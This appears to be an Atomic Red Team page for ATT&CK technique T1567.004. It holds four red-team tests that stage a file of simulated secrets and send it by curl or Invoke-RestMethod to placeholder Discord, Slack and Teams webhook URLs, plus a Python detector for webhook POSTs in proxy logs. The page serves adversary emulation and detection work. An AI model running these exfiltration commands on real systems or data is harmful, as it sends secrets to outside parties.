T1567.004
Exfiltration Over Web Service: Exfiltration Over Webhook
Description from ATT&CK
Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and webhook.site, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.

Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated Automated Exfiltration of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)
Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)
Atomic Tests
- Atomic Test #1: Exfiltrate staged data to a Discord webhook (PowerShell)
- Atomic Test #2: Exfiltrate staged file to a Discord webhook with curl (bash)
- Atomic Test #3: Exfiltrate staged data to a Slack webhook with curl (sh)
- Atomic Test #4: Exfiltrate staged data to a Microsoft Teams webhook (PowerShell)
Atomic Test #1: Exfiltrate staged data to a Discord webhook (PowerShell)
Stages a file containing simulated sensitive data and exfiltrates its contents to a
Discord incoming webhook by POSTing a JSON content payload over HTTPS. Webhook URLs
require no authentication header, so a single HTTPS POST is sufficient to move data out
of the environment while blending in with normal SaaS traffic.
See https://discord.com/developers/docs/resources/webhook#execute-webhook
Supported Platforms: Windows
auto_generated_guid: f0057c81-24dc-4a2e-b658-5809c242180b
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| webhook_url | Discord incoming webhook URL the staged data is exfiltrated to | string | https://discord.com/api/webhooks/000000000000000000/ReplaceWithYourWebhookToken |
| staged_file | Path to the file that is staged and exfiltrated | path | $env:TEMP\T1567.004_loot.txt |
Attack Commands: Run with powershell!
```powershell
# Stage a file containing simulated sensitive data
"secrets, api keys, passwords - T1567.004 atomic test" | Out-File -FilePath "#{staged_file}" -Encoding ascii
# Wrap the file contents in the JSON "content" field Discord webhooks expect
$body = @{ content = (Get-Content -Raw "#{staged_file}") } | ConvertTo-Json
# Single unauthenticated HTTPS POST to the webhook URL
Invoke-RestMethod -Uri "#{webhook_url}" -Method Post -ContentType 'application/json' -Body $body
```
Cleanup Commands
```powershell
Remove-Item -Path "#{staged_file}" -ErrorAction Ignore
```
Atomic Test #2: Exfiltrate staged file to a Discord webhook with curl (bash)
Stages a file containing simulated sensitive data and uploads it as a multipart
file attachment to a Discord incoming webhook using curl. This produces an outbound
HTTPS POST to a commonly allow-listed SaaS endpoint, mirroring real-world data theft
that abuses Discord webhooks for exfiltration.
See https://discord.com/developers/docs/resources/webhook#execute-webhook
Supported Platforms: Linux, macOS
auto_generated_guid: 40c44d16-bb49-4d14-aafa-f9ba7e6e6c5b
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| webhook_url | Discord incoming webhook URL the staged data is exfiltrated to | string | https://discord.com/api/webhooks/000000000000000000/ReplaceWithYourWebhookToken |
| staged_file | Path to the file that is staged and exfiltrated | path | /tmp/T1567.004_loot.txt |
Attack Commands: Run with bash!
```bash
# Stage a file containing simulated sensitive data
echo "secrets, api keys, passwords - T1567.004 atomic test" > "#{staged_file}"
# Upload the file as a multipart attachment to the webhook URL
curl -s -F "file=@#{staged_file}" "#{webhook_url}"
```
Cleanup Commands
```bash
rm -f "#{staged_file}"
```
Atomic Test #3: Exfiltrate staged data to a Slack webhook with curl (sh)
Stages a file containing simulated sensitive data and exfiltrates its contents to a
Slack incoming webhook by POSTing a JSON text payload with curl. Slack incoming
webhooks accept unauthenticated JSON POSTs, making them a low-friction exfiltration
channel that blends with legitimate collaboration traffic.
See https://api.slack.com/messaging/webhooks
Supported Platforms: Linux, macOS
auto_generated_guid: c666acd6-6ff5-4d28-9490-195d89cd4337
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| webhook_url | Slack incoming webhook URL the staged data is exfiltrated to | string | https://hooks.slack.com/services/T00000000/B00000000/ReplaceWithYourWebhookToken |
| staged_file | Path to the file that is staged and exfiltrated | path | /tmp/T1567.004_loot.txt |
Attack Commands: Run with sh!
```sh
# Stage a file containing simulated sensitive data
echo "secrets, api keys, passwords - T1567.004 atomic test" > "#{staged_file}"
# POST the file contents in the JSON "text" field Slack incoming webhooks expect
curl -s -X POST -H 'Content-type: application/json' --data "{\"text\":\"$(cat #{staged_file})\"}" "#{webhook_url}"
```
Cleanup Commands
```sh
rm -f "#{staged_file}"
```
Atomic Test #4: Exfiltrate staged data to a Microsoft Teams webhook (PowerShell)
Stages a file containing simulated sensitive data and exfiltrates its contents to a
Microsoft Teams incoming webhook (Office 365 connector / Power Automate workflow URL)
by POSTing a JSON text payload over HTTPS. The endpoint resides on a Microsoft-owned
domain, allowing the exfiltration to blend in with trusted corporate traffic.
See https://learn.microsoft.com/en-us/microsoftteams/platform/webhooks-and-connectors/how-to/add-incoming-webhook
Supported Platforms: Windows
auto_generated_guid: 35ad6590-2207-4b14-bf8f-9899470d7156
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| webhook_url | Microsoft Teams incoming webhook URL the staged data is exfiltrated to | string | https://example.webhook.office.com/webhookb2/00000000-0000-0000-0000-000000000000@00000000-0000-0000-0000-000000000000/IncomingWebhook/ReplaceWithYourWebhookToken |
| staged_file | Path to the file that is staged and exfiltrated | path | $env:TEMP\T1567.004_loot.txt |
Attack Commands: Run with powershell!
```powershell
# Stage a file containing simulated sensitive data
"secrets, api keys, passwords - T1567.004 atomic test" | Out-File -FilePath "#{staged_file}" -Encoding ascii
# Wrap the file contents in the JSON "text" field the Teams webhook expects
$body = @{ text = (Get-Content -Raw "#{staged_file}") } | ConvertTo-Json
# Single HTTPS POST to the Microsoft-hosted webhook URL
Invoke-RestMethod -Uri "#{webhook_url}" -Method Post -ContentType 'application/json' -Body $body
```
Cleanup Commands
```powershell
Remove-Item -Path "#{staged_file}" -ErrorAction Ignore
```
Atomic test(s) for this technique last updated: 2026-06-24 08:27:25 UTC
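All four atomic tests above produce the same observable: an outbound HTTPS POST to an incoming-webhook URL on a Discord, Slack or Microsoft-owned host. The detection helper below is an added example and not part of the Atomic Red Team project or this page; it matches the URL shapes of the endpoints the tests exercise (`discord.com/api/webhooks/<id>/`, `hooks.slack.com/services/`, `<tenant>.webhook.office.com/webhookb2/`) against web-proxy log lines and reports per-source POST counts and bytes sent. The space-separated log format, the field order and the sample lines are constructed for this example; adapt `LOG_RE` to your proxy's real schema.

```python
"""Detection helper for T1567.004 (Exfiltration Over Webhook).

Added example, not Atomic Red Team code. Flags outbound POSTs to the
incoming-webhook endpoints used by the atomic tests. The proxy log format
and the sample lines are constructed for this example.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, Optional

# URL shapes of the incoming-webhook endpoints from the tests above.
WEBHOOK_PATTERNS = [
    # Discord execute-webhook endpoint: /api/webhooks/<id>/<token>
    ("discord", re.compile(r"^https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/")),
    # Slack incoming webhook: /services/T.../B.../<token>
    ("slack", re.compile(r"^https?://hooks\.slack\.com/services/")),
    # Teams / Office 365 connector incoming webhook: <tenant>.webhook.office.com/webhookb2/
    ("teams", re.compile(r"^https?://[\w-]+\.webhook\.office\.com/webhookb2/")),
]

# Constructed proxy log schema: "<ts> <client_ip> <method> <url> <status> <bytes_out>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+"
    r"(?P<status>\d{3})\s+(?P<bytes_out>\d+)$"
)


@dataclass(frozen=True)
class Finding:
    ts: str
    src: str
    service: str
    url: str
    bytes_out: int


def classify_webhook(url: str) -> Optional[str]:
    """Return the webhook service name a URL belongs to, or None."""
    for service, pattern in WEBHOOK_PATTERNS:
        if pattern.match(url):
            return service
    return None


def parse_line(line: str) -> Optional[dict]:
    """Parse one proxy log line into its fields; None if it does not match the schema."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_webhook_posts(lines: Iterable[str], min_bytes: int = 0) -> list[Finding]:
    """Return POSTs to known webhook endpoints that sent at least min_bytes upstream.

    Only POST is considered: executing a webhook requires POST, whereas a GET
    to the same URL returns metadata and is not a data transfer.
    """
    findings: list[Finding] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        service = classify_webhook(rec["url"])
        if service is None:
            continue
        bytes_out = int(rec["bytes_out"])
        if bytes_out < min_bytes:
            continue
        findings.append(Finding(rec["ts"], rec["src"], service, rec["url"], bytes_out))
    return findings


def summarize_by_source(findings: Iterable[Finding]) -> dict[tuple[str, str], dict[str, int]]:
    """Aggregate POST count and bytes sent per (client, service) for triage."""
    totals: dict[tuple[str, str], dict[str, int]] = defaultdict(lambda: {"posts": 0, "bytes_out": 0})
    for f in findings:
        totals[(f.src, f.service)]["posts"] += 1
        totals[(f.src, f.service)]["bytes_out"] += f.bytes_out
    return dict(totals)


# Constructed sample log: two benign requests, one GET to a webhook URL, three webhook POSTs.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.1.2.3 GET https://discord.com/channels/@me 200 512
2024-05-01T10:00:05Z 10.1.2.3 POST https://discord.com/api/webhooks/000000000000000000/ReplaceWithYourWebhookToken 204 1870
2024-05-01T10:00:09Z 10.1.2.3 POST https://hooks.slack.com/services/T00000000/B00000000/ReplaceWithYourWebhookToken 200 960
2024-05-01T10:01:12Z 10.1.2.7 POST https://example.webhook.office.com/webhookb2/00000000-0000-0000-0000-000000000000@00000000-0000-0000-0000-000000000000/IncomingWebhook/ReplaceWithYourWebhookToken 200 4100
2024-05-01T10:01:30Z 10.1.2.7 POST https://api.github.com/repos/example/repo/issues 201 300
2024-05-01T10:02:00Z 10.1.2.9 GET https://discord.com/api/webhooks/000000000000000000/ReplaceWithYourWebhookToken 200 150
""".splitlines()

if __name__ == "__main__":
    hits = find_webhook_posts(SAMPLE_LOG)
    for f in hits:
        print(f"{f.ts} {f.src} -> {f.service} webhook, {f.bytes_out} bytes out")
    for (src, service), t in summarize_by_source(hits).items():
        print(f"{src} {service}: {t['posts']} POST(s), {t['bytes_out']} bytes")
```

Tune `min_bytes` to your environment: a single small JSON message is normal chat-integration traffic, while repeated POSTs or large multipart uploads from a workstation that owns no integration are what the tests above generate. Because Teams and Slack hosts are usually allow-listed, the URL path (not the hostname) is the distinguishing feature, so this check needs proxy or TLS-inspection logs that record the full request path.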